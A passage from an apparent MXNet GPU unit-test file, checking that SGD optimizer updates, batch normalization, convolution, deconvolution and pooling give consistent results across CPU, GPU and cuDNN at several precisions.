*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_m, mx_p_w32)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=0.95, momentum=momentum, out=mx_p_w)
else:
momentums_arr = [np.random.rand(*shape).astype(dtype) for shape in shapes]
mx_m = _make_ndarrays(momentums_arr)
mx_p_m = _make_ndarrays(momentums_arr)
mx.nd.multi_sgd_mom_update(
*_flatten_list(zip(mx_w, mx_g, mx_m)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=0.95, momentum=momentum, out=mx_w)
mx.nd.preloaded_multi_sgd_mom_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_m)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=0.95, momentum=momentum, out=mx_p_w)
def _assert_all_almost_equal(lhs_list, rhs_list, rtol, atol):
for i, (lhs, rhs) in enumerate(zip(lhs_list, rhs_list)):
assert_almost_equal(lhs.asnumpy(), rhs.asnumpy(), rtol=rtol, atol=atol)
if dtype == 'float16':
rtol = 1e-3
atol = 1e-2
else:
rtol = 1e-5
atol = 1e-6
_assert_all_almost_equal(mx_p_w, mx_w, rtol, atol)
if momentum is not None:
_assert_all_almost_equal(mx_p_m, mx_m, rtol, atol)
if use_master_weights:
_assert_all_almost_equal(mx_p_w32, mx_w32, 1e-5, 1e-6)
@with_seed()
def test_preloaded_multi_sgd():
dtypes = ['float16', 'float32']
momentums = [None, 0.9]
min_nparam = 5
max_nparam = 10
maxdim = 6
maxndim = 4
for dtype in dtypes:
use_master_weights_list = [False,] if dtype == 'float32' else [True, False]
for use_master_weights in use_master_weights_list:
for momentum in momentums:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(1, maxdim + 1, size=maxndim) for i in range(nparam)]
check_preloaded_multi_sgd(dtype, shapes, momentum, use_master_weights)
@with_seed()
def test_batchnorm_with_type():
ctx_list_v1_2D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
]
ctx_list_v2_2D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_1D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_3D = [
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}}
]
# V1, 2D
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=False)
check_consistency(sym, ctx_list_v1_2D)
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=True)
check_consistency(sym, ctx_list_v1_2D)
# V2, 2D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
# V2, 1D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
#
# # V2, 3D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
@with_seed()
def test_batchnorm_versions():
def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats):
ctx_list = []
sym_list = []
# BatchNormV1 cpu
if 'batchnorm_v1_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNormV1 gpu (organic)
if 'batchnorm_v1_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm cpu
if 'batchnorm_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm gpu (organic)
if 'batchnorm_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=True))
# BatchNorm gpu cudnn (if cudnn is enabled)
if 'batchnorm_cudnn' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=False))
check_consistency(sym_list, ctx_list)
def test_1d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 20)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_2d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 10, 10)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_v1_cpu', 'batchnorm_v1_gpu',
'batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_3d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 3, 5, 5)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
test_1d_batchnorm(True, False)
test_1d_batchnorm(False, False)
test_1d_batchnorm(False, True)
test_1d_batchnorm(True, True)
test_2d_batchnorm(True, False)
test_2d_batchnorm(False, False)
test_2d_batchnorm(False, True)
test_2d_batchnorm(True, True)
test_3d_batchnorm(True, False)
test_3d_batchnorm(False, False)
test_3d_batchnorm(False, True)
test_3d_batchnorm(True, True)
@with_seed(1234)
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_convolution_with_type():
sym1 = mx.sym.Convolution(num_filter=3, kernel=(3,3), name='conv')
data = mx.sym.Variable('conv_data')
w = mx.sym.Variable('conv_weight')
b = mx.sym.Variable('conv_bias')
w = mx.sym.transpose(w, axes=(0,2,3,1))
sym2 = mx.sym.transpose(data, axes=(0,2,3,1))
sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3,3))
sym2 = mx.sym.transpose(sym2, axes=(0,3,1,2), name='conv')
sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2]
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
# NHWC
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}}
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'conv_data': 'write', 'conv_weight': 'write', 'conv_bias': 'null'}, tol=tol)
# Apply N symbols against each of M contexts, checking that all NxM combinations match.
def check_consistency_NxM(sym_list, ctx_list):
# e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are:
# sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3]
check_consistency(np.repeat(sym_list, len(ctx_list)), ctx_list * len(sym_list), scale=0.5)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/10141")
@with_seed()
def test_convolution_options():
# 1D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 3D convolution
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed()
def test_conv_deconv_guards():
# Test cases for convolution and deconvolution via strided fft. Ensure that the framework
# guards against problematic CUDNN_CONVOLUTION_BWD_DATA_ALGO_FFT_TILING in cuDNN [7.3.1,7.5)
# see https://docs.nvidia.com/deeplearning/sdk/cudnn-release-notes/rel_750.html#rel_750
tol = 1e-1
for (op, opname) in [(mx.sym.Convolution, 'conv'), (mx.sym.Deconvolution, 'deconv')]:
dataname = opname + '_data'
ctx = {'ctx': mx.gpu(0), dataname: (32, 32, 64, 64), 'type_dict': {dataname: np.float32}}
test_cases = [
{'num_filter':32, 'kernel':(6,6), 'pad':(0,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(6,6), 'pad':(1,1), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(6,7), 'pad':(0,1), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,6), 'pad':(1,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,7), 'pad':(0,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,7), 'pad':(1,1), 'stride':(2,2), 'name': opname}]
for test_case_args in test_cases:
try:
sym = op(**test_case_args)
sym_no_cudnn = op(cudnn_off=True, **test_case_args)
check_consistency([sym, sym_no_cudnn], [ctx, ctx], tol=tol)
except:
print('Test failure of mx.sym.{} with args: {}'.format(op.__name__, test_case_args))
raise
def _conv_with_num_streams(seed):
with random_seed(seed):
# Try to expose timing-dependent improper workspace sharing by parallel dgrad and wgrad
num_trials = 20
for _ in range(num_trials):
size = np.random.randint(32, 128)
# The cudnn conv operator runs dgrad and wgrad in separate streams if enabled, with possible
# kernel overlap. The non-cudnn conv op doesn't do this so is used as the 'golden copy'.
ctx = {'ctx': mx.gpu(0), 'conv_data': (2, 2, size, size),
'type_dict': {'conv_data': np.float32}}
# Adding 'flip' here isolates the model from the input node (which can't use inplace store)
flipped = mx.sym.flip(axis=0, name='conv')
sym = mx.sym.Convolution(data=flipped, num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
flipped_no_cudnn = mx.sym.flip(axis=0, name='conv')
sym_no_cudnn = mx.sym.Convolution(data=flipped_no_cudnn, num_filter=3, kernel=(3,3), pad=(1,1),
cudnn_off=True, name='conv')
try:
# tol can be pretty high- we're looking for a large diff due to garbaged workspace
check_consistency([sym, sym_no_cudnn], [ctx, ctx], tol=1e-2)
except:
print('Failing conv size = {}'.format(size))
raise
@unittest.skip("skipping for now due to severe flakiness")
@with_seed()
def test_convolution_multiple_streams():
for num_streams in [1, 2]:
for engine in ['NaiveEngine', 'ThreadedEngine', 'ThreadedEnginePerDevice']:
print("Starting engine %s with %d streams." % (engine, num_streams), file=sys.stderr)
run_in_spawned_process(_conv_with_num_streams,
{'MXNET_GPU_WORKER_NSTREAMS' : num_streams, 'MXNET_ENGINE_TYPE' : engine})
print("Finished engine %s with %d streams." % (engine, num_streams), file=sys.stderr)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
def test_convolution_large_c():
problematic_c = 64 * 1024
# The convolution accumulates many values, so set large tolerances.
tol = {np.dtype(np.float32): 1,
np.dtype(np.float64): 1}
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCW', num_filter=8, kernel=(2,), name='conv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCHW', num_filter=4, kernel=(2,2), name='conv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
def test_deconvolution_large_c():
problematic_c = 64 * 1024
# The deconvolution accumulates many values, so set large tolerances.
tol = {np.dtype(np.float32): 1,
np.dtype(np.float64): 1}
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCW', num_filter=problematic_c, kernel=(2,), name='deconv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCHW', num_filter=problematic_c, kernel=(2,2), name='deconv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
@with_seed()
def test_convolution_versions():
# 2D convolution NCHW
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_v1_cpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_v1_gpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
syms = [conv_v1_cpu, conv_v1_gpu, conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# 3D convolution NCDHW
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
syms = [conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# More max-pooling strides and pads to test cudnn pooling implementation code paths
@with_seed()
def test_pooling_nhwc_with_convention():
def make_pooling_syms(**kwargs):
# Conventional NCHW layout pooling
sym = mx.sym.Pooling(**kwargs)
# NHWC pooling
data = mx.sym.Variable('pool_data')
sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1))
sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs)
sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool')
return [sym, sym_nhwc]
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare nhwc and nchw results only within a given precision.
for in_shape in [(3, 4, 8, 8), (2, 2, 20, 20)]:
for kernel in [(2,2), (3,3), (4,4)]:
for stride in [(1,1), (1,2), (2,1), (2,2)]:
for data_type in [np.float64, np.float32, np.float16]:
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': in_shape,
'type_dict': {'pool_data': data_type}}]
symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride,
pooling_convention='valid', name='pool')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride,
pooling_convention='full', name='pool')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(kernel=(300,300), pool_type='max',
global_pool=True, name='pool')
check_consistency_NxM(symlist, ctx_list)
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='valid', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='full', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
@with_seed()
def test_deconvolution_with_type():
# Test basic deconvolution without exercising stride, pad or dilation.
# 1D deconvolution
sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
# 2D deconvolution
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
@with_seed()
def test_deconvolution_options():
# 1D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='deconv')
